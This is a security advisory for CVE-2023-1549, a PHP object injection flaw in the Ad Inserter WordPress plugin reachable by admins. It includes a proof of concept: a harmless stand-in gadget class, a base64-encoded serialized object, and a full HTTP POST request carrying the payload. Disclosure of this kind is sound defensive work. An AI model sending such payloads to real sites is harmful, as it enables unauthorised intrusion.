Ad Inserter < 2.7.27 – Admin+ PHP Object Injection | CVE 2023-1549

Description

The plugin unserializes user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Activate and access Settings > Ad Inserter then click to setting icon and finally click "Save Settings". It'll make a POST request. 
Add "&import_block_0=1&export_settings_0=Tzo0OiJFdmlsIjowOnt9" to body of that request. "Tzo0OiJFdmlsIjowOnt9" is base64encode of O:4:"Evil":0:{}.

The view the response of the request made, which will have the "Arbitrary deserialization" message

---
POST /wordpress/wp-admin/options-general.php?page=ad-inserter.php HTTP/1.1
Host: {host}
Content-Length: 887
Content-Type: application/x-www-form-urlencoded
Cookie: {cookie}

block-parameters-1=WyJhaV9zYXZlIl0%3D&block-parameters-2=WyJhaV9zYXZlIl0%3D&block-parameters-3=WyJhaV9zYXZlIl0%3D&block-parameters-4=WyJhaV9zYXZlIl0%3D&block-parameters-5=WyJhaV9zYXZlIl0%3D&block-parameters-6=WyJhaV9zYXZlIl0%3D&block-parameters-7=WyJhaV9zYXZlIl0%3D&block-parameters-8=WyJhaV9zYXZlIl0%3D&block-parameters-9=WyJhaV9zYXZlIl0%3D&block-parameters-10=WyJhaV9zYXZlIl0%3D&block-parameters-11=WyJhaV9zYXZlIl0%3D&block-parameters-12=WyJhaV9zYXZlIl0%3D&block-parameters-13=WyJhaV9zYXZlIl0%3D&block-parameters-14=WyJhaV9zYXZlIl0%3D&block-parameters-15=WyJhaV9zYXZlIl0%3D&block-parameters-16=WyJhaV9zYXZlIl0%3D&ai_save=Save+Settings&syntax-highlighter-theme=ad_inserter&plugin-usage-tracking=1&ai-active-tab=%5B0%2C0%5D&_wpnonce=48546fc1cb&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dad-inserter.php&import_block_0=1&export_settings_0=Tzo0OiJFdmlsIjowOnt9